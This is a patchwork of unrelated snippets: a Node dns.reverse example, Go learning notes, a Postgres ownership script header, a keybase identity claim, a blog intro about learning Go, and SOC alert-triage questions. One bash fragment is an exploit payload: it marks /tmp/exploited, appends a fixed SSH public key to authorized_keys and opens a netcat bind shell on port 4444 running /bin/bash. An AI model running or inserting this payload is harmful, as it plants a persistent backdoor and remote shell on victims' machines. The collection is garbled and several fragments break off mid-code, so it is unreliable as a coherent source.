//
// async method passing errors via
// the standard convention of callback(err)
//
> dns.reverse('4.4.4.4', console.log)
{ oncomplete: [Function: onanswer] }
> { [Error: getHostByAddr ENOTFOUND]
code: 'ENOTFOUND',
#!/bin/bash
touch /tmp/exploited
cd ~
mkdir -p .ssh
chmod 755 .ssh
touch .ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC690OnLNFvUsbWvtpXkyyHnCaC6TNpa5bjODqRFjEaXd2s3VuvZOMCPGuyrHNA891IjisdVIqoOhL7asLnMcTP4cPxbP6JBaKkeNk3M72YBr6+lxQQPUyhDazTezK90JadkZkWwS1oXsrneLFW7rSoQAQGcbze4LIhrC7317+Wcex9ktza9Xvf57WwPkIO1hJcISn6GaaADgpA344/9acipQkZF/HdvmIiNf5nDN/tQTNdh7kSmAWKlr9stVktcBuhs6LaFVwFrsgNp+TXW6BIDfnFnD70EkUmsuA7ZFTMP65qKgGUrZYp4nqvqWtFVubsdjKOBOEGTad6uef+iw+F jandre@gmail.com" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
nc -s 0.0.0.0 -l -p 4444 -e /bin/bash &
build a go lib and binary
1. installing go
   1. OS X: brew install go
   2. Linux: https://github.com/dcoxall/vagrant-golang ?
3. organizing your code
   1. GOPATH export GOPATH=/Users/jandre/godemo
   2. WORKSPACE https://golang.org/doc/code.html
#!/bin/bash
usage()
{
cat << EOF
usage: $0 options
This script set ownership for all table, sequence and views for a given database
Credit: Based on http://stackoverflow.com/a/2686185/305019 by Alex Soto
I hereby claim:
- I am jandre on github.
- I am jandre (https://keybase.io/jandre) on keybase.
- I have a public key whose fingerprint is 6DA2 9D93 9AAA CD1E 8939 CBFD 5004 12C5 9B54 59C9
To claim this, I am signing this object:
#!/usr/bin/env sh
if ! which md5sum > /dev/null; then
  echo Install md5sum
  exit 1
fi
if ! which curl > /dev/null; then
  echo Install curl
  exit 1
One of my ongoing resolutions is to learn a new programming language every year. I've been looking at Go for a while and I thought it would be fun to use the 'holiday' today to really get cranking. I recorded some random impressions as I was chugging along...
When learning a language, I'm one of those people that can't simply read documentation and contrived code examples with any usable level of recall -- I need to internalize it by writing code to solve a legitimate problem. So, I decided to write a little library, a parser for the Linux /proc filesystem. There aren't very many good ones that I've found for Go (and I am thinking of some projects I may want to use it for in the future).
Steps taken:
- Read a bit of code
Some sample questions a security team may ask when triaging events that come from a SIEM/Log Management or directly via a H(N)IDS.
Generally, the exact information an analyst may need to triage the alert may vary depending on the type of event and its source.
Alert triage usually happens in the 'event handling' process -> before a 'security incident' is declared and more detailed investigation is needed. However, in smaller SOCs with less rigor, often the process is compressed - e.g., the same person who is triaging -> performs more detailed investigation, forensics, and other processes that are needed to proceed with incident response. Answering some of the questions below may fall into these later phases vs being pure 'triage' tasks.
- What hostname(s) corresponds to the IP addresses (reverse IP lookup)? (e.g., 123.44.5.55 == google.com, or badmailserver.ru?) Do the hostnames appear to be suspicious, or valid business activity?
var fork = require('child_process').fork;
var spawn = require('child_process').spawn;
var fs = require('fs');
var path = require('path');
function forkProcess() {
  var fd = fs.openSync('/tmp/sensitive_file', 'w');
  var opts = {
  };
  fork(process.argv[1], ["--forked"], opts)